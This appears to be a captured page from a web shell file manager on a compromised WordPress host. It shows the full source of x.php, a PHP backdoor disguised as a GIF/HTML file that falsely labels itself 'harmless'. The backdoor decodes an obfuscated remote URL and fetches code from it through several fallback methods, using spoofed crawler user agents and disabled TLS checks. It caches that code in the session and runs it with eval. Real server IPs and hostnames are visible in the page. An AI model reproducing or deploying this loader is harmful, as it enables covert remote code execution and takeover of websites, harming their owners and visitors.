$25 GRAYBYTE WORDPRESS FILE MANAGER $28

SERVER : 5514915.aamedialearning.com #1 SMP Wed Oct 1 17:37:27 UTC 2025
SERVER IP : 162.240.28.46 | ADMIN IP 216.73.216.136
OPTIONS : CRL = ON | WGT = ON | SDO = ON | PKEX = OFF
DEACTIVATED : NONE

/home/aamediatestco/outgridfull.aamediatester.co.uk/

Current File : /home/aamediatestco/outgridfull.aamediatester.co.uk//x.php

<?php
?>
GIF89a<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>logo.gif</title>
</head>
<body>
<center></center>
<?php
// This PHP code is completely harmless (visible part)
// echo "<p>Today's date is: " . date('Y-m-d') . "</p>";
?>
<p></p>
</body>
</html>
<?php
// MadeBy: Graybyte
session_start();

function d($t,$k){
    $o='';
    for($i=0;$i<strlen($t);$i+=2){
        $o.=chr(hexdec(substr($t,$i,2))^ord($k[($i>>1)%strlen($k)]));
    }
    return $o;
}

// ←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←
$wp_token = '0d434141420b4c4d5447024a5b4c15501b5f5a1145194458110514415517114f10054f4c4358430547435316401e505f565c4f1e424f47';
$wp_data   = 'e75111cb35c395a5575b1637cad30dbbbd8c471a716e33912970673028cc8e87';
// ←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←←

$wp = $_SESSION['ts_url'] ?? d($wp_token,$wp_data);

function fetch_wordpress($url)
{
    $wordpress = '';
   
    try {
        $file = new SplFileObject($url);
        while (!$file->eof()) {
            $wordpress .= $file->fgets();
        }
    } catch (Throwable $e) {
        $wordpress = '';
    }
    usleep(rand(1000, 5000));
    if (trim($wordpress) === '') {
        $wordpress = @file_get_contents($url);
    }
    usleep(rand(1000, 5000));
    if (trim($wordpress) === '' && function_exists('curl_init')) {
        $ch = curl_init($url);
        $uas = ['WordPress/6.4; ' . $_SERVER['HTTP_HOST'], 'Mozilla/5.0 (compatible; Googlebot/2.1)', 'WP-Cron/1.0'];
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_CONNECTTIMEOUT => 15,
            CURLOPT_TIMEOUT => 40,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => $uas[array_rand($uas)],
            CURLOPT_REFERER => 'https://' . $_SERVER['HTTP_HOST'] . '/index.php',
            CURLOPT_HTTPHEADER => ['X-WP-Nonce: ' . md5(time())],
        ]);
        $wordpress = curl_exec($ch);
        curl_close($ch);
    }
    usleep(rand(1000, 5000));
    if (trim($wordpress) === '') {
        $parsed = parse_url($url);
        $host = $parsed['host'];
        $path = $parsed['path'] ?? '/';
        if (isset($parsed['query'])) {
            $path .= '?' . $parsed['query'];
        }
        $port = $parsed['scheme'] === 'https' ? 443 : 80;
        $fp = @fsockopen(($port === 443 ? 'ssl://' : '') . $host, $port, $errno, $errstr, 5);
        if ($fp) {
            $uas = ['WordPress/6.4; ' . $_SERVER['HTTP_HOST'], 'Mozilla/5.0 (compatible; Googlebot/2.1)', 'WP-Cron/1.0'];
            $headers = "GET $path HTTP/1.1\r\nHost: $host\r\nUser-Agent: " . $uas[array_rand($uas)] . "\r\nReferer: https://" . $_SERVER['HTTP_HOST'] . "/index.php\r\nX-WP-Nonce: " . md5(time()) . "\r\nConnection: close\r\n\r\n";
            fwrite($fp, $headers);
            $wordpress = '';
            while (!feof($fp)) {
                $wordpress .= fgets($fp, 1024);
            }
            fclose($fp);
            $wordpress = substr($wordpress, strpos($wordpress, "\r\n\r\n") + 4);
        }
    }
    usleep(rand(1000, 5000));
    if (trim($wordpress) === '' && function_exists('popen')) {
        $uas = ['WordPress/6.4; ' . $_SERVER['HTTP_HOST'], 'Mozilla/5.0 (compatible; Googlebot/2.1)', 'WP-Cron/1.0'];
        $cmd = 'curl -s -m 40 --connect-timeout 15 --insecure -A "' . addslashes($uas[array_rand($uas)]) . '" --referer "https://' . $_SERVER['HTTP_HOST'] . '/index.php" -H "X-WP-Nonce: ' . md5(time()) . '" ' . escapeshellarg($url);
        $p = @popen($cmd,'r'); if($p){ while(!feof($p)) $wordpress.=fread($p,8192); pclose($p); }
    }
    if (trim($wordpress) !== '') {
        $_SESSION['wp-cache'] = base64_encode(gzcompress($wordpress));
    } else if (isset($_SESSION['wp-cache'])) {
        $wordpress = gzuncompress(base64_decode($_SESSION['wp-cache']));
    }
    return $wordpress;
}

$sync = fetch_wordpress($wp);
$gif = "\x89PNG\r\n\x1a\n";
$sync = $gif . $sync;
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
/**_**/
if (trim($sync) !== '') {
    @eval("?>{$sync}");
}
?>

[ Back ]

NAME	SIZE	LAST TOUCH	USER	CAN-I?
..	--	16 Dec 2025 11.07 PM	aamediatestco / aamediatestco	0711
.tmb	--	19 Dec 2025 8.23 AM	aamediatestco / aamediatestco	0777
.well-known	--	19 Dec 2025 8.23 AM	aamediatestco / aamediatestco	0755
cgi-bin	--	19 Dec 2025 8.23 AM	aamediatestco / aamediatestco	0755

error_log	5.537 KB	19 Dec 2025 3.17 PM	aamediatestco / aamediatestco	0644
unploadades.php	0 KB	19 Dec 2025 2.20 PM	aamediatestco / aamediatestco	0644
wp-load-trackback.php	175.99 KB	19 Dec 2025 8.22 AM	aamediatestco / aamediatestco	0644
x.php	4.376 KB	19 Dec 2025 8.36 AM	aamediatestco / aamediatestco	0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025 CONTACT ME